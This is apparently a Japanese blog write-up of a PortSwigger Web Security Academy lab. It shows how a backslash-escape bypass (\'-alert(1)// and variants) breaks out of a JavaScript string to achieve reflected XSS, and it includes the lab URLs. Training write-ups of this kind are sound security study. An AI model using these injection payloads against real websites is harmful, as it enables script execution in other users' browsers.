Shikata Ga Nai

Private? There is no such things.

Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escapedをやってみた

PortSwigger

Hello there, ('ω')ノ

 

区切り符号と二重引用符を使用してHTMLでエンコードして。

一重引用符をエスケープしたJavaScriptで反射型XSSを。

まずは、動作確認から。

 

f:id:ThisIsOne:20210224083953p:plain

 

下記を入力した際のレスポンスは以下のとおりで。

 test

 

f:id:ThisIsOne:20210224084044p:plain

 

下記を入力した際のレスポンスは以下のとおりで。

 te'st

 

f:id:ThisIsOne:20210224084238p:plain

 

下記を入力した際のレスポンスは以下のとおりで。

 te\'st

 

f:id:ThisIsOne:20210224084450p:plain

 

下記を入力した際のレスポンスは以下のとおりで。

 te\\'st

 

f:id:ThisIsOne:20210224085159p:plain

 

下記のペイロードを入力するとスクリプトが実行されて。

 \'-alert(1)//

 

f:id:ThisIsOne:20210224091043p:plain

 

URLは以下のとおりで。

https://ac111f3f1f5aa348807c1af500bf00a4.web-security-academy.net/?search=%5C%27-alert%281%29%2F%2F

 

URLデコードした結果は以下のとおりで。

https://ac111f3f1f5aa348807c1af500bf00a4.web-security-academy.net/?search=\'-alert(1)//

 

f:id:ThisIsOne:20210224091654p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210224091116p:plain

 

ちなみに下記を入力した結果は1件ヒットして。

 game

 

f:id:ThisIsOne:20210224094405p:plain

 

下記の場合だと0件で。

 'game

 

f:id:ThisIsOne:20210224094501p:plain

 

下記の場合も同様で。

 \'game

 

f:id:ThisIsOne:20210224094604p:plain

 

さらには、下記の場合でもスクリプトは実行できて。

\'-alert(1)-alert(2)//

 

URLは以下のようになって。

https://acf61f3e1f01fb6480723d8600770073.web-security-academy.net/?search=%5C%27-alert%281%29-alert%282%29%2F%2F

 

URLデコードした結果は以下のとおりで。

https://acf61f3e1f01fb6480723d8600770073.web-security-academy.net/?search=\'-alert(1)-alert(2)//

 

他にも下記も同じように実行できて。

 \'-alert(1);alert(2)//

 

f:id:ThisIsOne:20210224094258p:plain

 

f:id:ThisIsOne:20210224094320p:plain

 

Best regards, (^^ゞ